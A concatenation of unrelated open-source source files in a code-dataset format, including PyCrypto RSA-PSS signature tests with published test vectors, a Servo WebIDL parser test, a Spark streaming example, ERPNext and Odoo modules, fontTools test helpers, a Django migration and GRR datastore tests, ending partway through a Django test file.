e5 5f ee 89 6a 10 ce 70 7c 3e d7 e7 34 e4 47 27
a3 95 74 50 1a 53 26 83 10 9c 2a ba ca ba 28 3c
31 b4 bd 2f 53 c3 ee 37 e3 52 ce e3 4f 9e 50 3b
d8 0c 06 22 ad 79 c6 dc ee 88 35 47 c6 a3 b3 25'''
},
# Message
'''85 13 84 cd fe 81 9c 22 ed 6c 4c cb 30 da eb 5c
f0 59 bc 8e 11 66 b7 e3 53 0c 4c 23 3e 2b 5f 8f
71 a1 cc a5 82 d4 3e cc 72 b1 bc a1 6d fc 70 13
22 6b 9e''',
# Signature
'''3e f7 f4 6e 83 1b f9 2b 32 27 41 42 a5 85 ff ce
fb dc a7 b3 2a e9 0d 10 fb 0f 0c 72 99 84 f0 4e
f2 9a 9d f0 78 07 75 ce 43 73 9b 97 83 83 90 db
0a 55 05 e6 3d e9 27 02 8d 9d 29 b2 19 ca 2c 45
17 83 25 58 a5 5d 69 4a 6d 25 b9 da b6 60 03 c4
cc cd 90 78 02 19 3b e5 17 0d 26 14 7d 37 b9 35
90 24 1b e5 1c 25 05 5f 47 ef 62 75 2c fb e2 14
18 fa fe 98 c2 2c 4d 4d 47 72 4f db 56 69 e8 43''',
# Salt
'''ef 28 69 fa 40 c3 46 cb 18 3d ab 3d 7b ff c9 8f
d5 6d f4 2d''',
# Hash
SHA
),
#
# Example 2.1 to be found in
# ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
#
(
# Private key
{
'n':'''01 d4 0c 1b cf 97 a6 8a e7 cd bd 8a 7b f3 e3 4f
a1 9d cc a4 ef 75 a4 74 54 37 5f 94 51 4d 88 fe
d0 06 fb 82 9f 84 19 ff 87 d6 31 5d a6 8a 1f f3
a0 93 8e 9a bb 34 64 01 1c 30 3a d9 91 99 cf 0c
7c 7a 8b 47 7d ce 82 9e 88 44 f6 25 b1 15 e5 e9
c4 a5 9c f8 f8 11 3b 68 34 33 6a 2f d2 68 9b 47
2c bb 5e 5c ab e6 74 35 0c 59 b6 c1 7e 17 68 74
fb 42 f8 fc 3d 17 6a 01 7e dc 61 fd 32 6c 4b 33
c9''',
'e':'''01 00 01''',
'd':'''02 7d 14 7e 46 73 05 73 77 fd 1e a2 01 56 57 72
17 6a 7d c3 83 58 d3 76 04 56 85 a2 e7 87 c2 3c
15 57 6b c1 6b 9f 44 44 02 d6 bf c5 d9 8a 3e 88
ea 13 ef 67 c3 53 ec a0 c0 dd ba 92 55 bd 7b 8b
b5 0a 64 4a fd fd 1d d5 16 95 b2 52 d2 2e 73 18
d1 b6 68 7a 1c 10 ff 75 54 5f 3d b0 fe 60 2d 5f
2b 7f 29 4e 36 01 ea b7 b9 d1 ce cd 76 7f 64 69
2e 3e 53 6c a2 84 6c b0 c2 dd 48 6a 39 fa 75 b1'''
},
# Message
'''da ba 03 20 66 26 3f ae db 65 98 48 11 52 78 a5
2c 44 fa a3 a7 6f 37 51 5e d3 36 32 10 72 c4 0a
9d 9b 53 bc 05 01 40 78 ad f5 20 87 51 46 aa e7
0f f0 60 22 6d cb 7b 1f 1f c2 7e 93 60''',
# Signature
'''01 4c 5b a5 33 83 28 cc c6 e7 a9 0b f1 c0 ab 3f
d6 06 ff 47 96 d3 c1 2e 4b 63 9e d9 13 6a 5f ec
6c 16 d8 88 4b dd 99 cf dc 52 14 56 b0 74 2b 73
68 68 cf 90 de 09 9a db 8d 5f fd 1d ef f3 9b a4
00 7a b7 46 ce fd b2 2d 7d f0 e2 25 f5 46 27 dc
65 46 61 31 72 1b 90 af 44 53 63 a8 35 8b 9f 60
76 42 f7 8f ab 0a b0 f4 3b 71 68 d6 4b ae 70 d8
82 78 48 d8 ef 1e 42 1c 57 54 dd f4 2c 25 89 b5
b3''',
# Salt
'''57 bf 16 0b cb 02 bb 1d c7 28 0c f0 45 85 30 b7
d2 83 2f f7''',
SHA
),
#
# Example 8.1 to be found in
# ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
#
(
# Private key
{
'n':'''49 53 70 a1 fb 18 54 3c 16 d3 63 1e 31 63 25 5d
f6 2b e6 ee e8 90 d5 f2 55 09 e4 f7 78 a8 ea 6f
bb bc df 85 df f6 4e 0d 97 20 03 ab 36 81 fb ba
6d d4 1f d5 41 82 9b 2e 58 2d e9 f2 a4 a4 e0 a2
d0 90 0b ef 47 53 db 3c ee 0e e0 6c 7d fa e8 b1
d5 3b 59 53 21 8f 9c ce ea 69 5b 08 66 8e de aa
dc ed 94 63 b1 d7 90 d5 eb f2 7e 91 15 b4 6c ad
4d 9a 2b 8e fa b0 56 1b 08 10 34 47 39 ad a0 73
3f''',
'e':'''01 00 01''',
'd':'''6c 66 ff e9 89 80 c3 8f cd ea b5 15 98 98 83 61
65 f4 b4 b8 17 c4 f6 a8 d4 86 ee 4e a9 13 0f e9
b9 09 2b d1 36 d1 84 f9 5f 50 4a 60 7e ac 56 58
46 d2 fd d6 59 7a 89 67 c7 39 6e f9 5a 6e ee bb
45 78 a6 43 96 6d ca 4d 8e e3 de 84 2d e6 32 79
c6 18 15 9c 1a b5 4a 89 43 7b 6a 61 20 e4 93 0a
fb 52 a4 ba 6c ed 8a 49 47 ac 64 b3 0a 34 97 cb
e7 01 c2 d6 26 6d 51 72 19 ad 0e c6 d3 47 db e9'''
},
# Message
'''81 33 2f 4b e6 29 48 41 5e a1 d8 99 79 2e ea cf
6c 6e 1d b1 da 8b e1 3b 5c ea 41 db 2f ed 46 70
92 e1 ff 39 89 14 c7 14 25 97 75 f5 95 f8 54 7f
73 56 92 a5 75 e6 92 3a f7 8f 22 c6 99 7d db 90
fb 6f 72 d7 bb 0d d5 74 4a 31 de cd 3d c3 68 58
49 83 6e d3 4a ec 59 63 04 ad 11 84 3c 4f 88 48
9f 20 97 35 f5 fb 7f da f7 ce c8 ad dc 58 18 16
8f 88 0a cb f4 90 d5 10 05 b7 a8 e8 4e 43 e5 42
87 97 75 71 dd 99 ee a4 b1 61 eb 2d f1 f5 10 8f
12 a4 14 2a 83 32 2e db 05 a7 54 87 a3 43 5c 9a
78 ce 53 ed 93 bc 55 08 57 d7 a9 fb''',
# Signature
'''02 62 ac 25 4b fa 77 f3 c1 ac a2 2c 51 79 f8 f0
40 42 2b 3c 5b af d4 0a 8f 21 cf 0f a5 a6 67 cc
d5 99 3d 42 db af b4 09 c5 20 e2 5f ce 2b 1e e1
e7 16 57 7f 1e fa 17 f3 da 28 05 2f 40 f0 41 9b
23 10 6d 78 45 aa f0 11 25 b6 98 e7 a4 df e9 2d
39 67 bb 00 c4 d0 d3 5b a3 55 2a b9 a8 b3 ee f0
7c 7f ec db c5 42 4a c4 db 1e 20 cb 37 d0 b2 74
47 69 94 0e a9 07 e1 7f bb ca 67 3b 20 52 23 80
c5''',
# Salt
'''1d 65 49 1d 79 c8 64 b3 73 00 9b e6 f6 f2 46 7b
ac 4c 78 fa''',
SHA
)
)
def testSign1(self):
for i in range(len(self._testData)):
# Build the key
comps = [ long(rws(self._testData[i][0][x]),16) for x in ('n','e','d') ]
key = MyKey(RSA.construct(comps))
# Hash function
h = self._testData[i][4].new()
# Data to sign
h.update(t2b(self._testData[i][1]))
# Salt
test_salt = t2b(self._testData[i][3])
key._randfunc = lambda N: test_salt
# The real test
signer = PKCS.new(key)
self.failUnless(signer.can_sign())
s = signer.sign(h)
self.assertEqual(s, t2b(self._testData[i][2]))
def testVerify1(self):
for i in range(len(self._testData)):
# Build the key
comps = [ long(rws(self._testData[i][0][x]),16) for x in ('n','e') ]
key = MyKey(RSA.construct(comps))
# Hash function
h = self._testData[i][4].new()
# Data to sign
h.update(t2b(self._testData[i][1]))
# Salt
test_salt = t2b(self._testData[i][3])
# The real test
key._randfunc = lambda N: test_salt
verifier = PKCS.new(key)
self.failIf(verifier.can_sign())
result = verifier.verify(h, t2b(self._testData[i][2]))
self.failUnless(result)
def testSignVerify(self):
h = SHA.new()
h.update(b('blah blah blah'))
rng = Random.new().read
key = MyKey(RSA.generate(1024,rng))
# Helper function to monitor what's request from MGF
global mgfcalls
def newMGF(seed,maskLen):
global mgfcalls
mgfcalls += 1
return bchr(0x00)*maskLen
# Verify that PSS is friendly to all ciphers
for hashmod in (MD2,MD5,SHA,SHA224,SHA256,SHA384,RIPEMD):
h = hashmod.new()
h.update(b('blah blah blah'))
# Verify that sign() asks for as many random bytes
# as the hash output size
key.asked = 0
signer = PKCS.new(key)
s = signer.sign(h)
self.failUnless(signer.verify(h, s))
self.assertEqual(key.asked, h.digest_size)
h = SHA.new()
h.update(b('blah blah blah'))
# Verify that sign() uses a different salt length
for sLen in (0,3,21):
key.asked = 0
signer = PKCS.new(key, saltLen=sLen)
s = signer.sign(h)
self.assertEqual(key.asked, sLen)
self.failUnless(signer.verify(h, s))
# Verify that sign() uses the custom MGF
mgfcalls = 0
signer = PKCS.new(key, newMGF)
s = signer.sign(h)
self.assertEqual(mgfcalls, 1)
self.failUnless(signer.verify(h, s))
# Verify that sign() does not call the RNG
# when salt length is 0, even when a new MGF is provided
key.asked = 0
mgfcalls = 0
signer = PKCS.new(key, newMGF, 0)
s = signer.sign(h)
self.assertEqual(key.asked,0)
self.assertEqual(mgfcalls, 1)
self.failUnless(signer.verify(h, s))
def get_tests(config={}):
tests = []
tests += list_test_cases(PKCS1_PSS_Tests)
return tests
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4
| gpl-3.0 |
birryree/servo | components/script/dom/bindings/codegen/parser/tests/test_unforgeable.py | 127 | 7163 | def WebIDLTest(parser, harness):
parser.parse("""
interface Child : Parent {
};
interface Parent {
[Unforgeable] readonly attribute long foo;
};
""")
results = parser.finish()
harness.check(len(results), 2,
"Should be able to inherit from an interface with "
"[Unforgeable] properties.")
parser = parser.reset();
parser.parse("""
interface Child : Parent {
const short foo = 10;
};
interface Parent {
[Unforgeable] readonly attribute long foo;
};
""")
results = parser.finish()
harness.check(len(results), 2,
"Should be able to inherit from an interface with "
"[Unforgeable] properties even if we have a constant with "
"the same name.")
parser = parser.reset();
parser.parse("""
interface Child : Parent {
static attribute short foo;
};
interface Parent {
[Unforgeable] readonly attribute long foo;
};
""")
results = parser.finish()
harness.check(len(results), 2,
"Should be able to inherit from an interface with "
"[Unforgeable] properties even if we have a static attribute "
"with the same name.")
parser = parser.reset();
parser.parse("""
interface Child : Parent {
static void foo();
};
interface Parent {
[Unforgeable] readonly attribute long foo;
};
""")
results = parser.finish()
harness.check(len(results), 2,
"Should be able to inherit from an interface with "
"[Unforgeable] properties even if we have a static operation "
"with the same name.")
parser = parser.reset();
threw = False
try:
parser.parse("""
interface Child : Parent {
void foo();
};
interface Parent {
[Unforgeable] readonly attribute long foo;
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw,
"Should have thrown when shadowing unforgeable attribute on "
"parent with operation.")
parser = parser.reset();
threw = False
try:
parser.parse("""
interface Child : Parent {
void foo();
};
interface Parent {
[Unforgeable] void foo();
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw,
"Should have thrown when shadowing unforgeable operation on "
"parent with operation.")
parser = parser.reset();
threw = False
try:
parser.parse("""
interface Child : Parent {
attribute short foo;
};
interface Parent {
[Unforgeable] readonly attribute long foo;
};
""")
results = parser.finish()
except Exception,x:
threw = True
harness.ok(threw,
"Should have thrown when shadowing unforgeable attribute on "
"parent with attribute.")
parser = parser.reset();
threw = False
try:
parser.parse("""
interface Child : Parent {
attribute short foo;
};
interface Parent {
[Unforgeable] void foo();
};
""")
results = parser.finish()
except Exception,x:
threw = True
harness.ok(threw,
"Should have thrown when shadowing unforgeable operation on "
"parent with attribute.")
parser = parser.reset();
parser.parse("""
interface Child : Parent {
};
interface Parent {};
interface Consequential {
[Unforgeable] readonly attribute long foo;
};
Parent implements Consequential;
""")
results = parser.finish()
harness.check(len(results), 4,
"Should be able to inherit from an interface with a "
"consequential interface with [Unforgeable] properties.")
parser = parser.reset();
threw = False
try:
parser.parse("""
interface Child : Parent {
void foo();
};
interface Parent {};
interface Consequential {
[Unforgeable] readonly attribute long foo;
};
Parent implements Consequential;
""")
results = parser.finish()
except:
threw = True
harness.ok(threw,
"Should have thrown when shadowing unforgeable attribute "
"of parent's consequential interface.")
parser = parser.reset();
threw = False
try:
parser.parse("""
interface Child : Parent {
};
interface Parent : GrandParent {};
interface GrandParent {};
interface Consequential {
[Unforgeable] readonly attribute long foo;
};
GrandParent implements Consequential;
interface ChildConsequential {
void foo();
};
Child implements ChildConsequential;
""")
results = parser.finish()
except:
threw = True
harness.ok(threw,
"Should have thrown when our consequential interface shadows unforgeable attribute "
"of ancestor's consequential interface.")
parser = parser.reset();
threw = False
try:
parser.parse("""
interface Child : Parent {
};
interface Parent : GrandParent {};
interface GrandParent {};
interface Consequential {
[Unforgeable] void foo();
};
GrandParent implements Consequential;
interface ChildConsequential {
void foo();
};
Child implements ChildConsequential;
""")
results = parser.finish()
except:
threw = True
harness.ok(threw,
"Should have thrown when our consequential interface shadows unforgeable operation "
"of ancestor's consequential interface.")
parser = parser.reset();
parser.parse("""
interface iface {
[Unforgeable] attribute long foo;
};
""")
results = parser.finish()
harness.check(len(results), 1,
"Should allow writable [Unforgeable] attribute.")
parser = parser.reset();
threw = False
try:
parser.parse("""
interface iface {
[Unforgeable] static readonly attribute long foo;
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw, "Should have thrown for static [Unforgeable] attribute.")
| mpl-2.0 |
BryanCutler/spark | examples/src/main/python/streaming/stateful_network_wordcount.py | 27 | 2235 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
r"""
Counts words in UTF8 encoded, '\n' delimited text received from the
network every second.
Usage: stateful_network_wordcount.py <hostname> <port>
<hostname> and <port> describe the TCP server that Spark Streaming
would connect to receive data.
To run this on your local machine, you need to first run a Netcat server
`$ nc -lk 9999`
and then run the example
`$ bin/spark-submit examples/src/main/python/streaming/stateful_network_wordcount.py \
localhost 9999`
"""
import sys
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: stateful_network_wordcount.py <hostname> <port>", file=sys.stderr)
sys.exit(-1)
sc = SparkContext(appName="PythonStreamingStatefulNetworkWordCount")
ssc = StreamingContext(sc, 1)
ssc.checkpoint("checkpoint")
# RDD with initial state (key, value) pairs
initialStateRDD = sc.parallelize([(u'hello', 1), (u'world', 1)])
def updateFunc(new_values, last_sum):
return sum(new_values) + (last_sum or 0)
lines = ssc.socketTextStream(sys.argv[1], int(sys.argv[2]))
running_counts = lines.flatMap(lambda line: line.split(" "))\
.map(lambda word: (word, 1))\
.updateStateByKey(updateFunc, initialRDD=initialStateRDD)
running_counts.pprint()
ssc.start()
ssc.awaitTermination()
| apache-2.0 |
ESS-LLP/erpnext-medical | erpnext/accounts/report/non_billed_report.py | 40 | 1801 | # Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from erpnext import get_default_currency
from frappe.model.meta import get_field_precision
def get_ordered_to_be_billed_data(args):
doctype, party = args.get('doctype'), args.get('party')
child_tab = doctype + " Item"
precision = get_field_precision(frappe.get_meta(child_tab).get_field("billed_amt"),
currency=get_default_currency()) or 2
project_field = get_project_field(doctype, party)
return frappe.db.sql("""
Select
`{parent_tab}`.name, `{parent_tab}`.{date_field}, `{parent_tab}`.{party}, `{parent_tab}`.{party}_name,
{project_field}, `{child_tab}`.item_code, `{child_tab}`.base_amount,
(`{child_tab}`.billed_amt * ifnull(`{parent_tab}`.conversion_rate, 1)),
(`{child_tab}`.base_amount - (`{child_tab}`.billed_amt * ifnull(`{parent_tab}`.conversion_rate, 1))),
`{child_tab}`.item_name, `{child_tab}`.description, `{parent_tab}`.company
from
`{parent_tab}`, `{child_tab}`
where
`{parent_tab}`.name = `{child_tab}`.parent and `{parent_tab}`.docstatus = 1 and `{parent_tab}`.status != 'Closed'
and `{child_tab}`.amount > 0 and round(`{child_tab}`.billed_amt *
ifnull(`{parent_tab}`.conversion_rate, 1), {precision}) < `{child_tab}`.base_amount
order by
`{parent_tab}`.{order} {order_by}
""".format(parent_tab = 'tab' + doctype, child_tab = 'tab' + child_tab, precision= precision, party = party,
date_field = args.get('date'), project_field = project_field, order= args.get('order'), order_by = args.get('order_by')))
def get_project_field(doctype, party):
if party == "supplier": doctype = doctype + ' Item'
return "`tab%s`.project"%(doctype) | gpl-3.0 |
damdam-s/hr | __unported__/hr_worked_days_from_timesheet/hr_employee.py | 21 | 1239 | # -*- coding:utf-8 -*-
##############################################################################
#
# Copyright (C) 2012 - 2014 Odoo Canada. All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
class hr_employee(orm.Model):
_name = "hr.employee"
_inherit = "hr.employee"
_columns = {
'timesheet_sheet_ids': fields.one2many(
'hr_timesheet_sheet.sheet',
'employee_id',
'Timesheets'
)
}
| agpl-3.0 |
google/material-design-icons | update/venv/lib/python3.9/site-packages/fontTools/misc/testTools.py | 5 | 5433 | """Helpers for writing unit tests."""
from collections.abc import Iterable
from io import BytesIO
import os
import shutil
import sys
import tempfile
from unittest import TestCase as _TestCase
from fontTools.misc.py23 import tobytes
from fontTools.misc.xmlWriter import XMLWriter
def parseXML(xmlSnippet):
"""Parses a snippet of XML.
Input can be either a single string (unicode or UTF-8 bytes), or a
a sequence of strings.
The result is in the same format that would be returned by
XMLReader, but the parser imposes no constraints on the root
element so it can be called on small snippets of TTX files.
"""
# To support snippets with multiple elements, we add a fake root.
reader = TestXMLReader_()
xml = b"<root>"
if isinstance(xmlSnippet, bytes):
xml += xmlSnippet
elif isinstance(xmlSnippet, str):
xml += tobytes(xmlSnippet, 'utf-8')
elif isinstance(xmlSnippet, Iterable):
xml += b"".join(tobytes(s, 'utf-8') for s in xmlSnippet)
else:
raise TypeError("expected string or sequence of strings; found %r"
% type(xmlSnippet).__name__)
xml += b"</root>"
reader.parser.Parse(xml, 0)
return reader.root[2]
class FakeFont:
def __init__(self, glyphs):
self.glyphOrder_ = glyphs
self.reverseGlyphOrderDict_ = {g: i for i, g in enumerate(glyphs)}
self.lazy = False
self.tables = {}
def __getitem__(self, tag):
return self.tables[tag]
def __setitem__(self, tag, table):
self.tables[tag] = table
def get(self, tag, default=None):
return self.tables.get(tag, default)
def getGlyphID(self, name):
return self.reverseGlyphOrderDict_[name]
def getGlyphName(self, glyphID):
if glyphID < len(self.glyphOrder_):
return self.glyphOrder_[glyphID]
else:
return "glyph%.5d" % glyphID
def getGlyphOrder(self):
return self.glyphOrder_
def getReverseGlyphMap(self):
return self.reverseGlyphOrderDict_
def getGlyphNames(self):
return sorted(self.getGlyphOrder())
class TestXMLReader_(object):
def __init__(self):
from xml.parsers.expat import ParserCreate
self.parser = ParserCreate()
self.parser.StartElementHandler = self.startElement_
self.parser.EndElementHandler = self.endElement_
self.parser.CharacterDataHandler = self.addCharacterData_
self.root = None
self.stack = []
def startElement_(self, name, attrs):
element = (name, attrs, [])
if self.stack:
self.stack[-1][2].append(element)
else:
self.root = element
self.stack.append(element)
def endElement_(self, name):
self.stack.pop()
def addCharacterData_(self, data):
self.stack[-1][2].append(data)
def makeXMLWriter(newlinestr='\n'):
# don't write OS-specific new lines
writer = XMLWriter(BytesIO(), newlinestr=newlinestr)
# erase XML declaration
writer.file.seek(0)
writer.file.truncate()
return writer
def getXML(func, ttFont=None):
"""Call the passed toXML function and return the written content as a
list of lines (unicode strings).
Result is stripped of XML declaration and OS-specific newline characters.
"""
writer = makeXMLWriter()
func(writer, ttFont)
xml = writer.file.getvalue().decode("utf-8")
# toXML methods must always end with a writer.newline()
assert xml.endswith("\n")
return xml.splitlines()
class MockFont(object):
"""A font-like object that automatically adds any looked up glyphname
to its glyphOrder."""
def __init__(self):
self._glyphOrder = ['.notdef']
class AllocatingDict(dict):
def __missing__(reverseDict, key):
self._glyphOrder.append(key)
gid = len(reverseDict)
reverseDict[key] = gid
return gid
self._reverseGlyphOrder = AllocatingDict({'.notdef': 0})
self.lazy = False
def getGlyphID(self, glyph, requireReal=None):
gid = self._reverseGlyphOrder[glyph]
return gid
def getReverseGlyphMap(self):
return self._reverseGlyphOrder
def getGlyphName(self, gid):
return self._glyphOrder[gid]
def getGlyphOrder(self):
return self._glyphOrder
class TestCase(_TestCase):
def __init__(self, methodName):
_TestCase.__init__(self, methodName)
# Python 3 renamed assertRaisesRegexp to assertRaisesRegex,
# and fires deprecation warnings if a program uses the old name.
if not hasattr(self, "assertRaisesRegex"):
self.assertRaisesRegex = self.assertRaisesRegexp
class DataFilesHandler(TestCase):
def setUp(self):
self.tempdir = None
self.num_tempfiles = 0
def tearDown(self):
if self.tempdir:
shutil.rmtree(self.tempdir)
def getpath(self, testfile):
folder = os.path.dirname(sys.modules[self.__module__].__file__)
return os.path.join(folder, "data", testfile)
def temp_dir(self):
if not self.tempdir:
self.tempdir = tempfile.mkdtemp()
def temp_font(self, font_path, file_name):
self.temp_dir()
temppath = os.path.join(self.tempdir, file_name)
shutil.copy2(font_path, temppath)
return temppath
| apache-2.0 |
ReachingOut/unisubs | apps/auth/migrations/0007_auto__chg_field_awards_user.py | 5 | 6235 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Awards.user'
db.alter_column('auth_awards', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.CustomUser'], null=True))
def backwards(self, orm):
# Changing field 'Awards.user'
db.alter_column('auth_awards', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.CustomUser']))
models = {
'auth.awards': {
'Meta': {'object_name': 'Awards'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'points': ('django.db.models.fields.IntegerField', [], {}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.CustomUser']", 'null': 'True'})
},
'auth.customuser': {
'Meta': {'object_name': 'CustomUser', '_ormbases': ['auth.User']},
'autoplay_preferences': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'award_points': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'biography': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'changes_notification': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'preferred_language': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'}),
'valid_email': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.message': {
'Meta': {'object_name': 'Message'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'_message_set'", 'to': "orm['auth.User']"})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'auth.userlanguage': {
'Meta': {'unique_together': "(['user', 'language'],)", 'object_name': 'UserLanguage'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'proficiency': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.CustomUser']"})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['auth']
| agpl-3.0 |
ksmaheshkumar/grr | lib/data_stores/mongo_data_store_test.py | 4 | 2079 | #!/usr/bin/env python
"""Tests the mongo data store abstraction."""
# pylint: disable=unused-import,g-bad-import-order
from grr.lib import server_plugins
# pylint: enable=unused-import,g-bad-import-order
from grr.lib import access_control
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import data_store_test
from grr.lib import flags
from grr.lib import test_lib
from grr.lib.data_stores import mongo_data_store
# pylint: mode=test
class MongoTestMixin(object):
"""A mixin for Mongo tests."""
def InitDatastore(self):
"""Initializes the data store."""
self.token = access_control.ACLToken(username="test",
reason="Running tests")
config_lib.CONFIG.Set("Mongo.db_name", "grr_test_%s" %
self.__class__.__name__)
data_store.DB = mongo_data_store.MongoDataStore()
data_store.DB.security_manager = test_lib.MockSecurityManager()
self.DestroyDatastore()
def DestroyDatastore(self):
# Drop the collection.
data_store.DB.db_handle.drop_collection(data_store.DB.latest_collection)
data_store.DB.db_handle.drop_collection(data_store.DB.versioned_collection)
def testCorrectDataStore(self):
"""Makes sure the correct implementation is tested."""
self.assertTrue(isinstance(data_store.DB, mongo_data_store.MongoDataStore))
class MongoDataStoreTest(MongoTestMixin, data_store_test._DataStoreTest):
"""Test the mongo data store abstraction."""
class MongoDataStoreBenchmarks(MongoTestMixin,
data_store_test.DataStoreBenchmarks):
"""Benchmark the mongo data store abstraction."""
# Mongo is really slow at this, make sure that the test doesn't run too long.
# 500 is standard for other data stores.
files_per_dir = 50
class MongoDataStoreCSVBenchmarks(MongoTestMixin,
data_store_test.DataStoreCSVBenchmarks):
"""Benchmark the mongo data store abstraction."""
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
| apache-2.0 |
Neamar/django | tests/test_utils/tests.py | 91 | 38793 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import warnings
from django.conf.urls import url
from django.contrib.staticfiles.finders import get_finder, get_finders
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.files.storage import default_storage
from django.core.urlresolvers import NoReverseMatch, reverse
from django.db import connection, router
from django.forms import EmailField, IntegerField
from django.http import HttpResponse
from django.template.loader import render_to_string
from django.test import (
SimpleTestCase, TestCase, ignore_warnings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.html import HTMLParseError, parse_html
from django.test.utils import CaptureQueriesContext, override_settings
from django.utils import six
from django.utils._os import abspathu
from django.utils.deprecation import RemovedInDjango20Warning
from .models import Car, Person, PossessedCar
from .views import empty_response
class SkippingTestCase(SimpleTestCase):
def _assert_skipping(self, func, expected_exc):
# We cannot simply use assertRaises because a SkipTest exception will go unnoticed
try:
func()
except expected_exc:
pass
